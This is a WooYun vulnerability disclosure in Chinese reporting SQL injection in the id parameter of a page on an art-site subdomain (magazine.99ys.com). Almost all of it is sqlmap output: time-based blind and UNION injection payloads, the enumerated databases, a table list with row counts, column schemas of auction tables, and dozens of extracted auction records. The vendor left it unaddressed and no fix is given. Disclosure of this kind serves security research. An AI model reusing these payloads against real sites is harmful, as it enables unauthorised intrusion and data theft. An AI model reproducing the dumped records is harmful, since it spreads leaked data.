当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0173488

漏洞标题:99艺术网某分站一处SQL注入导致大量用户及拍卖交易信息泄露

相关厂商:99艺术网

漏洞作者: 路人甲

提交时间:2016-01-31 08:59

修复时间:2016-03-14 15:10

公开时间:2016-03-14 15:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-31: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-03-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

rt

详细说明:

http://magazine.99ys.com/hdbox.php?id=5285&page=1


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=5285 AND (SELECT * FROM (SELECT(SLEEP(5)))ALAJ)&page=1
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-6546 UNION ALL SELECT NULL,CONCAT(0x717a787071,0x4b457a4c646c78426d4d,0x7170626a71)
,NULL-- &page=1
---
[23:13:50] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.16, PHP 5.5.27
back-end DBMS: MySQL 5.0.12
[23:13:50] [INFO] fetching database names
[23:13:50] [INFO] the SQL query used returns 4 entries
[23:13:50] [INFO] resumed: information_schema
[23:13:50] [INFO] resumed: 99yss
[23:13:50] [INFO] resumed: cacti
[23:13:50] [INFO] resumed: test
available databases [4]:
[*] 99yss
[*] cacti
[*] information_schema
[*] test

漏洞证明:

Database: 99yss
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| `99art_news_tags` | 664044 |
| `99art_auction_work` | 560280 |
| `99_auction_work` | 537135 |
| `99art_auction_work22` | 537049 |
| vert_auction_work | 516396 |
| `99_news_tags` | 433854 |
| `99art_news_attribute` | 335335 |
| `99art_news_images` | 307909 |
| `99_news_attribute` | 177772 |
| `99_news_images` | 175267 |
| `99art_news_hit` | 160863 |
| `99art_news_category` | 157557 |
| `99art_news` | 157555 |
| `99art_news_tags_fulltext` | 157469 |
| vert_images | 142531 |
| `99art_exhibit_works` | 132675 |
| vert_mall_comment | 128561 |
| `99_news_title` | 93424 |
| `99_news_hit` | 93361 |
| `99_news` | 92598 |
| `99_news_content` | 91453 |
| vert_exhibit_works | 81357 |
| `99user_work` | 75608 |
| `99_works` | 69408 |
| `99art_exhibit_works1` | 65127 |
| `99_exhibit_works` | 65104 |
| vert_cha_works | 55567 |
| `99_artist_works` | 40222 |
| `99user_category` | 25058 |
| `99special_zan_ip` | 22692 |
| vert_gal_exhibit | 18396 |
| `99art_news_mechanism` | 17072 |
| `99art_exhibit` | 14523 |
| vert_index_history | 13838 |
| `99user_news` | 11648 |
| `99art_news_people` | 11011 |
| `99art_auction_special` | 10221 |
| vert_index_history_old | 9683 |
| `99art_index_history` | 9670 |
| `99user_message` | 8967 |
| vert_comment | 8613 |
| vert_en_comment | 8338 |
| vert_exhibit | 8071 |
| `99app_push` | 7396 |
| `99art_exhibit1` | 6454 |
| `99_exhibit` | 6436 |
| vert_cha_article | 6205 |
| `99user_photo` | 5736 |
| vert_publish_content | 5360 |
| `99_recommend_history` | 5205 |
| `99art_live_images` | 5166 |
| `99user_tags` | 4778 |
| `99art_ad_hit_new` | 4508 |
| `99user_work_album` | 4315 |
| `99art_comment` | 4238 |
| live_images | 4178 |
| vert_gal_works | 3982 |
| `99user_photo_album` | 3772 |
| `99art_index_shhistory` | 3732 |
| `99user_hit` | 3572 |
| `99user_modul` | 3568 |
| `99user_artist_intro` | 3539 |
| `99user_users` | 3421 |
| `99art_index_cdhistory` | 3330 |
| `99_auction_special` | 3286 |
| `99art_auction_address` | 2761 |
| `99art_auction` | 2657 |
| `99art_area` | 2469 |
| vert_area | 2465 |
| vert_auction_special | 2460 |
| vert_cha_artist | 2425 |
| vert_gal_gallery | 2215 |
| vert_tags | 2147 |
| `99app_special_sub` | 2026 |
| `99art_comment_floor` | 1999 |
| `99_feature_index` | 1923 |
| `99_artist` | 1906 |
| `99user_yearbook` | 1836 |
| vert_en_news | 1823 |
| `99art_exhibit_do` | 1803 |
| `99art_auction_work1` | 1555 |
| `99_mechanism` | 1532 |
| `99_mechanism_bak` | 1479 |
| `99art_news_exhibit` | 1469 |
| vert_exhibit_news | 1456 |
| `99_feature_import` | 1433 |
| `99art_index` | 1369 |
| `99art_auction_hit` | 1342 |
| `99_exhibit_news22` | 1317 |
| `99art_live_comment` | 1265 |
| `99app_headlines` | 1261 |
| `99_exhibit_news` | 1242 |
| live_comment | 1239 |
| `99art_index_newhistory` | 1216 |
| vert_publish_list | 1118 |
| vert_del | 1085 |
| `99app_collecting` | 1028 |
| `99_auction_work1` | 1019 |
| vert_index | 946 |
| vert_en_works | 921 |
| `99app_imglook` | 882 |
| `99_comment` | 867 |
| vert_artist | 852 |
| notepreg | 835 |
| `99_news_recycling` | 819 |
| fail_record | 694 |
| gather_info | 659 |
| vert_gallery | 657 |
| vert_en_exhibition | 608 |
| vert_auction | 587 |
| vert_cha_works_artist | 500 |
| vert_auction_icfbse | 491 |
| operate | 425 |
| vert_mall_goods | 394 |
| vert_auction_agencies | 361 |
| vert_deet | 344 |
| `99user_comment` | 309 |
| `99special_comment` | 293 |
| `99special_article` | 245 |
| `99art_index_modul` | 204 |
| `99special_zan` | 199 |
| `99art_index_modul20131103` | 190 |
| `99art_ad_new` | 174 |
| vert_publish_name | 170 |
| vert_index_modul | 164 |
| `99user_artist_link` | 163 |
| source | 161 |
| `99_index_modul` | 156 |
| `99app_feedback` | 134 |
| `99art_ad_column_new` | 128 |
| `99_recommend` | 117 |
| `99art_column` | 115 |
| `99art_live` | 112 |
| source_mol | 108 |
| `99app_focusimg` | 106 |
| `99art_live_exhibit` | 106 |
| vert_ad | 102 |
| vert_link | 100 |
| vert_en_index | 92 |
| live | 91 |
| live_exhibit | 87 |
| vert_special_comment | 87 |
| vert_category | 79 |
| vert_gal_publish | 78 |
| vert_event | 77 |
| vert_email | 72 |
| vert_cha_series | 69 |
| `99art_exhibit_charge` | 55 |
| `99_column` | 50 |
| `99app_special` | 46 |
| `99special_author` | 46 |
| vert_en_artist | 45 |
| vert_special_viewpoint | 44 |
| vert_focus_picture | 38 |
| `99art_ad` | 35 |
| `99_feature_module` | 34 |
| user_session_id | 30 |
| vert_live_comment | 27 |
| vert_admin | 26 |
| vert_en_link | 26 |
| `99_index` | 23 |
| `99_attribute` | 21 |
| `99_exhibit_target` | 19 |
| `99art_exhibit_target` | 19 |
| vert_exhibit_target | 19 |
| `99_relative` | 18 |
| vert_synopsis | 18 |
| `99app_search_key` | 17 |
| `99_community` | 16 |
| `99art_ad_news` | 16 |
| vert_cha_community | 16 |
| vert_en_category | 16 |
| `99_artist_category` | 15 |
| `99user_media` | 15 |
| vert_cha_category | 15 |
| `99_feature` | 14 |
| `99_recommend_position` | 14 |
| vert_en_ad | 14 |
| vert_live_images | 14 |
| `99user_cover` | 12 |
| vert_en_link_category | 11 |
| vert_link_category | 11 |
| security | 9 |
| `99art_ad_column` | 8 |
| vert_live_related | 8 |
| vert_special_subject | 8 |
| `99_ad_column` | 7 |
| `99_auction_attribute` | 6 |
| `99_exhibit_category` | 6 |
| `99_mechanism_category` | 6 |
| `99art_auction_attribute` | 6 |
| `99art_exhibit_category` | 6 |
| vert_auction_category | 6 |
| vert_en_modul | 6 |
| vert_exhibit_category | 6 |
| `99_artist_class` | 5 |
| `99user_class` | 5 |
| `99user_sys_category` | 5 |
| vert_cha_class | 5 |
| vert_gal_category | 5 |
| `99art_position_web` | 4 |
| `99ceshi` | 3 |
| `99_works_category` | 2 |
| `99special_image` | 2 |
| vert_mall_news | 2 |
| vert_organ | 2 |
| `99app_about` | 1 |
| `99app_ad` | 1 |
| vert_search_key | 1 |
+-----------------------------+---------+


Database: 99yss
Table: 99art_auction_work
[38 columns]
+---------------+--------------+
| Column | Type |
+---------------+--------------+
| order | smallint(6) |
| size | varchar(50) |
| year | varchar(50) |
| admin | varchar(50) |
| aid | int(11) |
| auc_name | varchar(50) |
| auc_time | int(11) |
| author | varchar(50) |
| author_id | int(11) |
| author_intro | text |
| author_year | varchar(100) |
| cat_num | varchar(20) |
| company | varchar(50) |
| content | text |
| deal_val_eur | varchar(50) |
| deal_val_hkd | varchar(50) |
| deal_val_rmb | varchar(50) |
| deal_val_usd | varchar(50) |
| est_max | varchar(50) |
| est_min | varchar(50) |
| est_type | smallint(6) |
| id | int(11) |
| materials | varchar(50) |
| mid | int(11) |
| money_prefix | char(4) |
| mtype | smallint(6) |
| other | text |
| pub_time | int(11) |
| sid | int(11) |
| specail_name | varchar(100) |
| src | varchar(30) |
| statement | varchar(255) |
| type | varchar(50) |
| valuation_eur | varchar(50) |
| valuation_hkd | varchar(50) |
| valuation_usd | varchar(50) |
| valuations | varchar(50) |
| work_name | varchar(150) |
+---------------+--------------+


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=5285 AND (SELECT * FROM (SELECT(SLEEP(5)))ALAJ)&page=1
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-6546 UNION ALL SELECT NULL,CONCAT(0x717a787071,0x4b457a4c646c78426d4d,0x7170626a71)
,NULL-- &page=1
---
[23:15:38] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.16, PHP 5.5.27
back-end DBMS: MySQL 5.0.12
Database: 99yss
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| `99art_auction_work` | 560280 |
+----------------------+---------+
[23:15:38] [INFO] fetching columns 'admin, auc_name, author, author_id, cat_num, work_name' for tabl
e '99art_auction_work' in database '99yss'
[23:15:38] [INFO] the SQL query used returns 6 entries
[23:15:38] [INFO] resumed: "auc_name","varchar(50)"
[23:15:38] [INFO] resumed: "cat_num","varchar(20)"
[23:15:38] [INFO] resumed: "work_name","varchar(150)"
[23:15:38] [INFO] resumed: "author","varchar(50)"
[23:15:38] [INFO] resumed: "admin","varchar(50)"
[23:15:38] [INFO] resumed: "author_id","int(11)"
[23:15:38] [INFO] fetching entries of column(s) 'admin, auc_name, author, author_id, cat_num, work_n
ame' for table '99art_auction_work' in database '99yss'
[23:15:38] [INFO] the SQL query used returns 560280 entries
[23:15:39] [WARNING] reflective value(s) found and filtering out
[23:15:39] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","王雪涛","0","0054","瓶花图"
[23:15:39] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","王雪涛","0","0055","草虫花卉"
[23:15:39] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","齐白石","0","0056","葡萄"
[23:15:39] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","白雪石","0","0057","漓江春晓"
[23:15:39] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","白雪石","0","0058","春风漓水"
[23:15:40] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","方济众","0","0059","岩畔"
[23:15:40] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","王雪涛","0","0060","凌霄八哥"
[23:15:40] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","李苦禅","0","0061","松鹰图"
[23:15:40] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","许麐庐 黄胄","0","0062","古乐...
[23:15:40] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","孙其峰","0","0063","林间春晚"
[23:15:40] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","孙其峰","0","0064","水滨"
[23:15:41] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","郭味蕖","0","0065","茶花"
[23:15:41] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","郭味蕖","0","0066","墨梅图"
[23:15:41] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","亚明 于希宁","0","0067","明珠璀灿
"
[23:15:41] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","张辛国","0","0068","大吉图"
[23:15:41] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","吕林","0","0069","熊猫"
[23:15:42] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","张正宇","0","0070","熊猫"
[23:15:42] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","张正宇","0","0071","熊猫"
[23:15:42] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","黄永玉","0","0072","大解脱"
[23:15:42] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","王子武","0","0073","曹雪芹小像"
[23:15:43] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","叶浅予","0","0074","藏族舞者"
[23:15:43] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","刘汉","0","0075","奔月图"
[23:15:43] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","林锴","0","0076","酩酊夜归图"
[23:15:43] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","齐燕铭","0","0077","篆书"
[23:15:43] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","何海霞","0","0078","行书五言诗"
[23:15:43] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","吴作人","0","0079","行书"
[23:15:44] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","吴作人","0","0080","行书"
[23:15:44] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","李苦禅","0","0081","章草七言诗"
[23:15:44] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","董寿平","0","0082","草书毛主席词"
[23:15:44] [INFO] retrieved: "admin","嘉德四季第二十四期拍卖会","启功","0","0083","草书五言诗"


Database: 99yss
Table: 99art_auction_work22
[38 columns]
+---------------+--------------+
| Column | Type |
+---------------+--------------+
| order | smallint(6) |
| size | varchar(50) |
| year | varchar(50) |
| admin | varchar(50) |
| aid | int(11) |
| auc_name | varchar(50) |
| auc_time | int(11) |
| author | varchar(50) |
| author_id | int(11) |
| author_intro | text |
| author_year | varchar(100) |
| cat_num | varchar(20) |
| company | varchar(50) |
| content | text |
| deal_val_eur | varchar(50) |
| deal_val_hkd | varchar(50) |
| deal_val_rmb | varchar(50) |
| deal_val_usd | varchar(50) |
| est_max | varchar(50) |
| est_min | varchar(50) |
| est_type | smallint(6) |
| id | int(11) |
| materials | varchar(50) |
| mid | int(11) |
| money_prefix | char(4) |
| mtype | smallint(6) |
| other | text |
| pub_time | int(11) |
| sid | int(11) |
| specail_name | varchar(100) |
| src | varchar(30) |
| statement | varchar(255) |
| type | varchar(50) |
| valuation_eur | varchar(50) |
| valuation_hkd | varchar(50) |
| valuation_usd | varchar(50) |
| valuations | varchar(50) |
| work_name | varchar(150) |
+---------------+--------------+


Database: 99yss
Table: 99_auction_work
[34 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| order | smallint(6) |
| size | varchar(50) |
| year | varchar(50) |
| admin | varchar(50) |
| aid | int(11) |
| auc_company | varchar(50) |
| auc_name | varchar(50) |
| auc_time | int(11) |
| author | varchar(50) |
| author_intro | text |
| author_year | varchar(100) |
| cat_num | varchar(20) |
| content | text |
| deal_val_eur | varchar(50) |
| deal_val_hkd | varchar(50) |
| deal_val_rmb | varchar(50) |
| deal_val_usd | varchar(50) |
| est_max | varchar(50) |
| est_min | varchar(50) |
| est_type | smallint(6) |
| gal_id | int(11) |
| id | int(11) |
| materials | varchar(50) |
| money_prefix | char(4) |
| mtype | smallint(6) |
| other | text |
| pub_time | int(11) |
| sid | int(11) |
| specail_name | varchar(100) |
| src | varchar(30) |
| statement | varchar(255) |
| type | varchar(50) |
| valuations | varchar(50) |
| work_name | varchar(150) |
+--------------+--------------+


修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)